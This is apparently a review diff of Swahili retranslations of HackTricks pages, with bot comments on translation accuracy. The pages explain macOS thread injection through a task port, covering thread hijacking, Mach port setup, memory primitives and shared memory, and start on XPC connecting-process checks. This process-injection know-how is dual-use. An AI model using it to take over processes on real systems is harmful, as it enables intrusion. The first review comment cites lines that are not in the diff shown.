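Review bot: the AppleScript test snippet (`set theDialogText to "PWND"` / `display dialog theDialogText`) is fenced with a `bash` language tag; it is not shell and should be tagged `applescript` so it is not mistaken for a terminal command. Several of the re-translations in this file lose meaning compared to the removed lines and should be reverted: `kuikadiria` (to estimate) replaces `kuihifadhi kwenye akiba` (to cache it) in the Gatekeeper preparation step; `2. **Kufuta Faili ya NIB**` (deleting) replaces `Kubadilisha` (replacing) although the bullet under it still says `Badilisha faili ya NIB iliyopo`; `takwimu` (statistics) replaces `data` in the proof-of-concept heading and bullet; and `amri zisizo na mipaka` / `msimbo usio na mipaka` ("commands/code without limits") replace `kiholela`, the usual rendering of "arbitrary". `Ushahidi wa Dhihirisho` is also an odd rendering of "proof of concept" next to the removed `Uthibitisho wa Dhana`. Finally, the link markup on the first content line is broken in both versions: `[https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/).**` puts the closing `**` inside the link text and leaves a stray `.**`; it should read `[https://blog.xpnsec.com/dirtynib/](https://blog.xpnsec.com/dirtynib/).**` so the bold span that opens at the start of the line closes after the period.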

View file

@ -1,68 +1,69 @@
# Uingizaji wa Thread kwenye macOS kupitia Task port
# macOS Thread Injection via Task port
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Kanuni
## Code
* [https://github.com/bazad/threadexec](https://github.com/bazad/threadexec)
* [https://gist.github.com/knightsc/bd6dfeccb02b77eb6409db5601dcef36](https://gist.github.com/knightsc/bd6dfeccb02b77eb6409db5601dcef36)
## 1. Udukuzi wa Thread
## 1. Thread Hijacking
Kwanza, kazi ya **`task_threads()`** inaitwa kwenye task port ili kupata orodha ya nyuzi kutoka kwa kazi ya mbali. Nyuzi moja inachaguliwa kwa udukuzi. Njia hii inatofautiana na njia za kawaida za kuingiza nambari kama kuunda nyuzi mpya ya mbali imezuiwa kutokana na kinga mpya inayozuia `thread_create_running()`.
Kwanza, **`task_threads()`** inaitwa kwenye task port ili kupata orodha ya nyuzi kutoka kwa kazi ya mbali. Nyuzi moja inachaguliwa kwa ajili ya hijacking. Njia hii inatofautiana na mbinu za kawaida za kuingiza msimbo kwani kuunda nyuzi mpya za mbali kunakatazwa kutokana na ulinzi mpya unaozuia `thread_create_running()`.
Kudhibiti nyuzi, **`thread_suspend()`** inaitwa, ikisimamisha utekelezaji wake.
Ili kudhibiti nyuzi, **`thread_suspend()`** inaitwa, ikisimamisha utekelezaji wake.
Operesheni pekee zinazoruhusiwa kwenye nyuzi ya mbali ni **kusimamisha** na **kuanza** nyuzi hiyo, **kupata** na **kubadilisha** thamani za usajili wake. Wito wa kazi za mbali huanzishwa kwa kuweka usajili `x0` hadi `x7` kama **hoja**, kusanidi **`pc`** kuelekea kazi inayotakiwa, na kuamsha nyuzi. Kuhakikisha nyuzi haipati ajali baada ya kurudi kunahitaji kugundua kurudi.
Operesheni pekee zinazoruhusiwa kwenye nyuzi ya mbali zinahusisha **kusimamisha** na **kuanzisha** hiyo, **kupata** na **kubadilisha** thamani zake za register. Kuitwa kwa kazi za mbali kunaanzishwa kwa kuweka register `x0` hadi `x7` kwa **hoja**, kuunda **`pc`** ili kuelekeza kwenye kazi inayotakiwa, na kuanzisha nyuzi. Kuhakikisha kuwa nyuzi haiporomoki baada ya kurudi kunahitaji kugundua kurudi.
Mbinu moja inahusisha **kujiandikisha kwa mchakato wa kipekee** kwa nyuzi ya mbali kwa kutumia `thread_set_exception_ports()`, kuweka usajili wa `lr` kwa anwani batili kabla ya wito wa kazi. Hii inasababisha kuzuka kwa kipekee baada ya utekelezaji wa kazi, kutuma ujumbe kwenye bandari ya kipekee, kuruhusu ukaguzi wa hali ya nyuzi kupona thamani ya kurudi. Kwa njia nyingine, kama ilivyochukuliwa kutoka kwa udanganyifu wa triple\_fetch wa Ian Beer, `lr` inawekwa kwenye mzunguko usio na mwisho. Usajili wa nyuzi basi unafuatiliwa mara kwa mara hadi **`pc` inapoelekeza kwenye maagizo hayo**.
Stratejia moja inahusisha **kujiandikisha kwa mhandisi wa makosa** kwa nyuzi ya mbali kwa kutumia `thread_set_exception_ports()`, kuweka register `lr` kwenye anwani isiyo sahihi kabla ya wito wa kazi. Hii inasababisha makosa baada ya utekelezaji wa kazi, ikituma ujumbe kwenye bandari ya makosa, ikiruhusu ukaguzi wa hali ya nyuzi ili kurejesha thamani ya kurudi. Vinginevyo, kama ilivyopitishwa kutoka kwa exploit ya triple_fetch ya Ian Beer, `lr` inawekwa ili kuzunguka bila kikomo. Registers za nyuzi kisha zinaangaliwa kwa karibu hadi **`pc` inapoelekeza kwenye hiyo amri**.
## 2. Mach ports kwa mawasiliano
## 2. Mach ports for communication
Hatua inayofuata inahusisha kuanzisha Mach ports ili kurahisisha mawasiliano na nyuzi ya mbali. Bandari hizi ni muhimu katika kuhamisha haki za kutuma na kupokea za kiholela kati ya kazi.
Awamu inayofuata inahusisha kuanzisha Mach ports ili kuwezesha mawasiliano na nyuzi ya mbali. Bandari hizi ni muhimu katika kuhamasisha haki za kutuma na kupokea zisizo na mipaka kati ya kazi.
Kwa mawasiliano ya pande mbili, haki mbili za kupokea za Mach zinaundwa: moja katika kazi ya ndani na nyingine katika kazi ya mbali. Baadaye, haki ya kutuma kwa kila bandari inahamishiwa kwa kazi mwenza, kuruhusu kubadilishana ujumbe.
Kwa mawasiliano ya pande mbili, haki mbili za kupokea Mach zinaundwa: moja katika kazi ya ndani na nyingine katika kazi ya mbali. Kisha, haki ya kutuma kwa kila bandari inahamishwa kwa kazi ya mwenzake, ikiruhusu kubadilishana ujumbe.
Kuzingatia bandari ya ndani, haki ya kupokea inashikiliwa na kazi ya ndani. Bandari inaundwa na `mach_port_allocate()`. Changamoto inapatikana katika kuhamisha haki ya kutuma kwa bandari hii kwenda kwa kazi ya mbali.
Kuzingatia bandari ya ndani, haki ya kupokea inashikiliwa na kazi ya ndani. Bandari inaundwa kwa `mach_port_allocate()`. Changamoto iko katika kuhamasisha haki ya kutuma kwa bandari hii kwenye kazi ya mbali.
Mbinu inahusisha kutumia `thread_set_special_port()` kuweka haki ya kutuma kwa bandari ya ndani kwenye `THREAD_KERNEL_PORT` ya nyuzi ya mbali. Kisha, nyuzi ya mbali inaagizwa kuita `mach_thread_self()` ili kupata haki ya kutuma.
Stratejia inahusisha kutumia `thread_set_special_port()` kuweka haki ya kutuma kwa bandari ya ndani katika `THREAD_KERNEL_PORT` ya nyuzi ya mbali. Kisha, nyuzi ya mbali inaelekezwa kuita `mach_thread_self()` ili kupata haki ya kutuma.
Kwa bandari ya mbali, mchakato ni kinyume kabisa. Nyuzi ya mbali inaelekezwa kuzalisha bandari ya Mach kupitia `mach_reply_port()` (kwa kuwa `mach_port_allocate()` haifai kutokana na utaratibu wake wa kurudi). Baada ya kuundwa kwa bandari, `mach_port_insert_right()` inaitwa kwenye nyuzi ya mbali kuweka haki ya kutuma. Haki hii kisha inawekwa kwenye kernel kwa kutumia `thread_set_special_port()`. Kurudi kwenye kazi ya ndani, `thread_get_special_port()` inatumika kwenye nyuzi ya mbali kupata haki ya kutuma kwa bandari ya Mach iliyotengwa hivi karibuni kwenye kazi ya mbali.
Kwa bandari ya mbali, mchakato kimsingi unarudiwa. Nyuzi ya mbali inaelekezwa kuunda bandari ya Mach kupitia `mach_reply_port()` (kama `mach_port_allocate()` haiwezi kutumika kutokana na mfumo wake wa kurudi). Baada ya kuundwa kwa bandari, `mach_port_insert_right()` inaitwa katika nyuzi ya mbali ili kuanzisha haki ya kutuma. Haki hii kisha inahifadhiwa kwenye kernel kwa kutumia `thread_set_special_port()`. Kurudi kwenye kazi ya ndani, `thread_get_special_port()` inatumika kwenye nyuzi ya mbali ili kupata haki ya kutuma kwa bandari mpya ya Mach iliyotolewa katika kazi ya mbali.
Kukamilika kwa hatua hizi kunasababisha kuanzishwa kwa Mach ports, kuweka msingi wa mawasiliano ya pande mbili.
## 3. Misingi ya Kusoma/Kuandika Kumbukumbu
## 3. Basic Memory Read/Write Primitives
Katika sehemu hii, lengo ni kutumia mbinu ya kutekeleza kusoma na kuandika kumbukumbu za msingi. Hatua hizi za awali ni muhimu kwa kupata udhibiti zaidi juu ya mchakato wa mbali, ingawa misingi katika hatua hii haitumiki kwa madhumuni mengi. Hivi karibuni, zitaboreshwa kuwa toleo la juu zaidi.
Katika sehemu hii, lengo ni kutumia primitive ya kutekeleza ili kuanzisha primitive za msingi za kusoma na kuandika kumbukumbu. Hatua hizi za awali ni muhimu kwa kupata udhibiti zaidi juu ya mchakato wa mbali, ingawa primitive katika hatua hii hazitakuwa na matumizi mengi. Hivi karibuni, zitaimarishwa kuwa toleo za juu zaidi.
### Kusoma na Kuandika Kumbukumbu Kwa Kutumia Mbinu ya Kutekeleza
### Memory Reading and Writing Using Execute Primitive
Lengo ni kusoma na kuandika kumbukumbu kwa kutumia kazi maalum. Kwa kusoma kumbukumbu, hutumiwa kazi zinazofanana na muundo ufuatao:
Lengo ni kufanya kusoma na kuandika kumbukumbu kwa kutumia kazi maalum. Kwa kusoma kumbukumbu, kazi zinazofanana na muundo ufuatao zinatumika:
```c
uint64_t read_func(uint64_t *address) {
return *address;
}
```
Na kwa kuandika kwenye kumbukumbu, hutumiwa kazi zinazofanana na muundo huu:
Na kwa kuandika kwenye kumbukumbu, kazi zinazofanana na muundo huu hutumiwa:
```c
void write_func(uint64_t *address, uint64_t value) {
*address = value;
}
```
Hizi kazi zinafanana na maagizo ya mkutano yaliyotolewa:
Hizi kazi zinahusiana na maagizo ya mkusanyiko yaliyotolewa:
```
_read_func:
ldr x0, [x0]
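Review bot: the new translation switches the section headings back to English while the body stays in Swahili (`## 2. Mach ports for communication` and `## 3. Basic Memory Read/Write Primitives` replace fully Swahili headings); either keep the Swahili headings or translate the whole page consistently. Two word choices in this hunk also change meaning: `kuhamasisha` (to mobilise, to motivate) is used where the old text had `kuhamisha` (to transfer) for moving send and receive rights between tasks, and `zisizo na mipaka` (without limits) replaces `kiholela` for "arbitrary"; the old terms are the correct ones and should be restored in both places.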
@ -73,108 +74,108 @@ ret
```
### Kutambua Kazi Zinazofaa
Uchunguzi wa maktaba za kawaida ulifunua wagombea sahihi kwa shughuli hizi:
Kuchunguza maktaba za kawaida kumefichua wagombea wanaofaa kwa ajili ya operesheni hizi:
1. **Kusoma Kumbukumbu:**
Kazi ya `property_getName()` kutoka [Maktaba ya Objective-C runtime](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) imebainishwa kuwa kazi inayofaa kwa kusoma kumbukumbu. Kazi hiyo imefafanuliwa hapa chini:
Funguo la `property_getName()` kutoka kwenye [maktaba ya wakati wa Objective-C](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) linatambuliwa kama kazi inayofaa kwa kusoma kumbukumbu. Kazi hiyo imeelezwa hapa chini:
```c
const char *property_getName(objc_property_t prop) {
return prop->name;
}
```
Hii kazi inafanya kazi kama `read_func` kwa kurudisha uga wa kwanza wa `objc_property_t`.
Hii kazi inafanya kazi kama `read_func` kwa kurudisha uwanja wa kwanza wa `objc_property_t`.
2. **Kuandika Kumbukumbu:**
Kupata kazi iliyotengenezwa tayari ya kuandika kumbukumbu ni changamoto zaidi. Walakini, kazi ya `_xpc_int64_set_value()` kutoka kwa libxpc ni mgombea mzuri na disassembly ifuatayo:
Kupata kazi iliyojengwa awali ya kuandika kumbukumbu ni changamoto zaidi. Hata hivyo, kazi ya `_xpc_int64_set_value()` kutoka libxpc ni mgombea mzuri ikiwa na disassembly ifuatayo:
```c
__xpc_int64_set_value:
str x1, [x0, #0x18]
ret
```
Kufanya uandishi wa biti 64 kwenye anwani maalum, wito wa mbali unajengwa kama ifuatavyo:
Ili kufanya kuandika 64-bit katika anwani maalum, wito wa mbali umeundwa kama:
```c
_xpc_int64_set_value(address - 0x18, value)
```
Kwa kutumia msingi huu, hatua zimeandaliwa kwa ajili ya kuunda kumbukumbu ya pamoja, ambayo ni hatua muhimu katika kudhibiti mchakato wa mbali.
With these primitives established, the stage is set for creating shared memory, marking a significant progression in controlling the remote process.
## 4. Kuweka Kumbukumbu ya Pamoja
## 4. Usanidi wa Kumbukumbu ya Pamoja
Lengo ni kuweka kumbukumbu ya pamoja kati ya kazi za ndani na za mbali, kurahisisha uhamishaji wa data na kurahisisha wito wa kazi zenye hoja nyingi. Njia inahusisha kutumia `libxpc` na aina yake ya kitu cha `OS_xpc_shmem`, ambayo imejengwa kwenye kuingia kumbukumbu ya Mach.
Lengo ni kuanzisha kumbukumbu ya pamoja kati ya kazi za ndani na za mbali, kuifanya iwe rahisi kuhamasisha data na kuwezesha wito wa kazi zenye hoja nyingi. Njia hii inahusisha kutumia `libxpc` na aina ya kitu chake `OS_xpc_shmem`, ambayo imejengwa juu ya entries za kumbukumbu za Mach.
### Muhtasari wa Mchakato:
### Muonekano wa Mchakato:
1. **Ugawaji wa Kumbukumbu**:
- Gawa kumbukumbu kwa ajili ya kushiriki kwa kutumia `mach_vm_allocate()`.
- Tumia `xpc_shmem_create()` kuunda kitu cha `OS_xpc_shmem` kwa eneo la kumbukumbu iliyotengwa. Kazi hii itasimamia uundaji wa kuingia kumbukumbu ya Mach na kuhifadhi haki ya kutuma ya Mach kwenye nafasi ya `0x18` ya kitu cha `OS_xpc_shmem`.
- Panga kumbukumbu kwa ajili ya kushiriki kwa kutumia `mach_vm_allocate()`.
- Tumia `xpc_shmem_create()` kuunda kitu cha `OS_xpc_shmem` kwa ajili ya eneo la kumbukumbu lililotengwa. Kazi hii itasimamia uundaji wa entry ya kumbukumbu ya Mach na kuhifadhi haki ya kutuma ya Mach kwenye offset `0x18` ya kitu cha `OS_xpc_shmem`.
2. **Kuunda Kumbukumbu ya Pamoja katika Mchakato wa Mbali**:
- Gawa kumbukumbu kwa ajili ya kitu cha `OS_xpc_shmem` katika mchakato wa mbali kwa kutumia wito wa mbali kwa `malloc()`.
- Nakili maudhui ya kitu cha `OS_xpc_shmem` cha ndani kwenda kwenye mchakato wa mbali. Hata hivyo, nakala hii ya awali itakuwa na majina ya kuingia kumbukumbu ya Mach yasiyofaa kwenye nafasi ya `0x18`.
- Panga kumbukumbu kwa ajili ya kitu cha `OS_xpc_shmem` katika mchakato wa mbali kwa wito wa mbali kwa `malloc()`.
- Nakili maudhui ya kitu cha ndani cha `OS_xpc_shmem` kwenye mchakato wa mbali. Hata hivyo, nakala hii ya awali itakuwa na majina yasiyo sahihi ya entry za kumbukumbu za Mach kwenye offset `0x18`.
3. **Kurekebisha Kuingia Kumbukumbu ya Mach**:
- Tumia njia ya `thread_set_special_port()` kuweka haki ya kutuma ya kuingia kumbukumbu ya Mach kwenye kazi ya mbali.
- Rekebisha uga wa kuingia kumbukumbu ya Mach kwenye nafasi ya `0x18` kwa kuandika juu yake jina la kuingia kumbukumbu ya mbali.
3. **Kurekebisha Entry ya Kumbukumbu ya Mach**:
- Tumia njia ya `thread_set_special_port()` kuingiza haki ya kutuma kwa entry ya kumbukumbu ya Mach kwenye kazi ya mbali.
- Rekebisha uwanja wa entry ya kumbukumbu ya Mach kwenye offset `0x18` kwa kuandika upya kwa jina la entry ya kumbukumbu ya mbali.
4. **Kukamilisha Kuweka Kumbukumbu ya Pamoja**:
- Thibitisha kitu cha `OS_xpc_shmem` cha mbali.
- Weka ramani ya kumbukumbu ya pamoja kwa kutumia wito wa mbali kwa `xpc_shmem_remote()`.
4. **Kumaliza Usanidi wa Kumbukumbu ya Pamoja**:
- Thibitisha kitu cha mbali cha `OS_xpc_shmem`.
- Kuanzisha ramani ya kumbukumbu ya pamoja kwa wito wa mbali kwa `xpc_shmem_remote()`.
Kwa kufuata hatua hizi, kumbukumbu ya pamoja kati ya kazi za ndani na za mbali itawekwa kwa ufanisi, kuruhusu uhamishaji wa data kwa urahisi na utekelezaji wa kazi zinazohitaji hoja nyingi.
Kwa kufuata hatua hizi, kumbukumbu ya pamoja kati ya kazi za ndani na za mbali itakuwa imewekwa kwa ufanisi, ikiruhusu uhamasishaji wa data rahisi na utekelezaji wa kazi zinazohitaji hoja nyingi.
## Vifungu vingine vya Kanuni
## Mifano ya Kode za Ziada
Kwa ugawaji wa kumbukumbu na uundaji wa kitu cha kumbukumbu ya pamoja:
```c
mach_vm_allocate();
xpc_shmem_create();
```
Kwa kujenga na kusahihisha kifaa cha kumbukumbu kinachoshiriki katika mchakato wa mbali:
Ili kuunda na kurekebisha kitu cha kumbukumbu kilichoshirikiwa katika mchakato wa mbali:
```c
malloc(); // for allocating memory remotely
thread_set_special_port(); // for inserting send right
```
Kumbuka kushughulikia maelezo ya Mach ports na majina ya kumbukumbu kwa usahihi ili kuhakikisha kuwa usanidi wa kumbukumbu ulioshiriki unafanya kazi vizuri.
Kumbuka kushughulikia maelezo ya Mach ports na majina ya kuingia kwenye kumbukumbu kwa usahihi ili kuhakikisha kuwa usanidi wa kumbukumbu iliyoshirikiwa unafanya kazi ipasavyo.
## 5. Kufikia Udhibiti Kamili
Baada ya kuanzisha kumbukumbu iliyoshiriki na kupata uwezo wa kutekeleza kwa hiari, kimsingi tumepata udhibiti kamili juu ya mchakato wa lengo. Kazi muhimu zinazoruhusu udhibiti huu ni:
Baada ya kufanikiwa kuanzisha kumbukumbu iliyoshirikiwa na kupata uwezo wa kutekeleza kwa njia isiyo na mipaka, kimsingi tumepata udhibiti kamili juu ya mchakato wa lengo. Kazi muhimu zinazowezesha udhibiti huu ni:
1. **Operesheni za Kumbukumbu za Hiari**:
- Fanya kusoma kumbukumbu za hiari kwa kuita `memcpy()` ili kunakili data kutoka eneo lililoshirikiwa.
- Tekeleza kuandika kumbukumbu za hiari kwa kutumia `memcpy()` kuhamisha data kwenye eneo lililoshirikiwa.
1. **Operesheni za Kumbukumbu zisizo na mipaka**:
- Fanya usomaji wa kumbukumbu zisizo na mipaka kwa kuita `memcpy()` ili nakala data kutoka kwenye eneo lililosharikiwa.
- Tekeleza uandishi wa kumbukumbu zisizo na mipaka kwa kutumia `memcpy()` kuhamasisha data kwenye eneo lililosharikiwa.
2. **Kushughulikia Wito wa Kazi na Vigezo Vingi**:
- Kwa kazi zinazohitaji zaidi ya vigezo 8, panga vigezo ziada kwenye steki kulingana na mkataba wa wito.
2. **Kushughulikia Kuitwa kwa Kazi zenye Hoja Nyingi**:
- Kwa kazi zinazohitaji zaidi ya hoja 8, panga hoja za ziada kwenye stack kwa kufuata kanuni ya kuita.
3. **Uhamisho wa Mach Port**:
- Hamisha Mach ports kati ya kazi kupitia ujumbe wa Mach kupitia bandari zilizowekwa hapo awali.
- Hamisha Mach ports kati ya kazi kupitia ujumbe wa Mach kupitia bandari zilizowekwa awali.
4. **Uhamisho wa Descripta ya Faili**:
- Hamisha descripta za faili kati ya michakato kwa kutumia fileports, mbinu iliyobainishwa na Ian Beer katika `triple_fetch`.
4. **Uhamisho wa File Descriptor**:
- Hamisha file descriptors kati ya michakato kwa kutumia fileports, mbinu iliyosisitizwa na Ian Beer katika `triple_fetch`.
Udhibiti kamili huu umefungwa ndani ya maktaba ya [threadexec](https://github.com/bazad/threadexec), ikitoa utekelezaji wa kina na kiolesura cha mtumiaji rafiki kwa mwingiliano na mchakato wa mwathirika.
Udhibiti huu wa kina umejumuishwa ndani ya maktaba ya [threadexec](https://github.com/bazad/threadexec), ikitoa utekelezaji wa kina na API rafiki kwa mtumiaji kwa mwingiliano na mchakato wa mwathirika.
## Mambo Muhimu ya Kuzingatia:
## Maelezo Muhimu:
- Hakikisha matumizi sahihi ya `memcpy()` kwa operesheni za kusoma/kuandika kumbukumbu ili kudumisha utulivu wa mfumo na usahihi wa data.
- Wakati wa kuhamisha Mach ports au descripta za faili, fuata itifaki sahihi na shughulikia rasilimali kwa uwajibikaji ili kuzuia uvujaji au ufikiaji usiokusudiwa.
- Hakikisha matumizi sahihi ya `memcpy()` kwa operesheni za kusoma/kandika kumbukumbu ili kudumisha utulivu wa mfumo na uadilifu wa data.
- Unapohamisha Mach ports au file descriptors, fuata itifaki sahihi na shughuikia rasilimali kwa uwajibikaji ili kuzuia leaks au ufikiaji usio na mpango.
Kwa kufuata mwongozo huu na kutumia maktaba ya `threadexec`, mtu anaweza kusimamia na kuingiliana na michakato kwa kiwango cha kina, kufikia udhibiti kamili juu ya mchakato wa lengo.
Kwa kufuata miongozo hii na kutumia maktaba ya `threadexec`, mtu anaweza kudhibiti kwa ufanisi na kuingiliana na michakato kwa kiwango kidogo, akipata udhibiti kamili juu ya mchakato wa lengo.
## Marejeo
* [https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/](https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
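Review bot: several lines regress in accuracy and one is left untranslated. `Funguo la property_getName()` calls the function a key; the old `Kazi ya property_getName()` is right. The sentence `With these primitives established, the stage is set for creating shared memory, ...` is still English and needs translating like its neighbours. `kuhamasisha`/`uhamasishaji` again stand in for transfer (`kuhamisha`) throughout the shared-memory and Mach-port steps, `zisizo na mipaka` again replaces `kiholela` for the arbitrary read/write primitives, and `kwa kiwango kidogo` (at a small level) drops the "granular" meaning the old `kwa kiwango cha kina` carried. Typos in the key-notes bullets: `kandika` for `kuandika` and `shughuikia` for `shughulikia`.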


@ -1,60 +1,61 @@
# Uthibitisho wa Uunganishaji wa Mchakato wa macOS XPC
# macOS XPC Connecting Process Check
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks katika PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Uthibitisho wa Uunganishaji wa Mchakato wa XPC
## XPC Connecting Process Check
Wakati uunganishaji unafanywa kwa huduma ya XPC, seva itathibitisha ikiwa uunganishaji huo unaruhusiwa. Hizi ni uthibitisho ambao kawaida hufanywa:
Wakati muunganisho unapoanzishwa na huduma ya XPC, seva itakagua ikiwa muunganisho unaruhusiwa. Hizi ndizo ukaguzi ambao kawaida hufanywa:
1. Angalia ikiwa **mchakato unaounganisha umesainiwa na cheti kilichosainiwa na Apple** (kinachotolewa tu na Apple).
* Ikiwa hii **haitathibitishwa**, mshambuliaji anaweza kuunda **cheti bandia** ili kufanana na uthibitisho mwingine wowote.
2. Angalia ikiwa mchakato unaounganisha umesainiwa na **cheti cha shirika** (uthibitisho wa kitambulisho cha timu).
* Ikiwa hii **haitathibitishwa**, **cheti chochote cha maendeleo** kutoka Apple kinaweza kutumika kwa kusaini na kuunganisha na huduma.
3. Angalia ikiwa mchakato unaounganisha una **kitambulisho sahihi cha kifurushi**.
* Ikiwa hii **haitathibitishwa**, zana yoyote **iliyosainiwa na shirika lile lile** inaweza kutumika kwa kuingiliana na huduma ya XPC.
1. Angalia ikiwa **mchakato unaounganisha umeandikwa na cheti kilichosainiwa na Apple** (ambacho kinatolewa tu na Apple).
* Ikiwa hii **haijathibitishwa**, mshambuliaji anaweza kuunda **cheti bandia** ili kufanana na ukaguzi mwingine wowote.
2. Angalia ikiwa mchakato unaounganisha umeandikwa na **cheti cha shirika**, (uthibitisho wa kitambulisho cha timu).
* Ikiwa hii **haijathibitishwa**, **cheti chochote cha mende** kutoka Apple kinaweza kutumika kwa kusaini, na kuungana na huduma.
3. Angalia ikiwa mchakato unaounganisha **una kitambulisho sahihi cha kifurushi**.
* Ikiwa hii **haijathibitishwa**, chombo chochote **kilichosainiwa na shirika hilo hilo** kinaweza kutumika kuingiliana na huduma ya XPC.
4. (4 au 5) Angalia ikiwa mchakato unaounganisha una **nambari sahihi ya toleo la programu**.
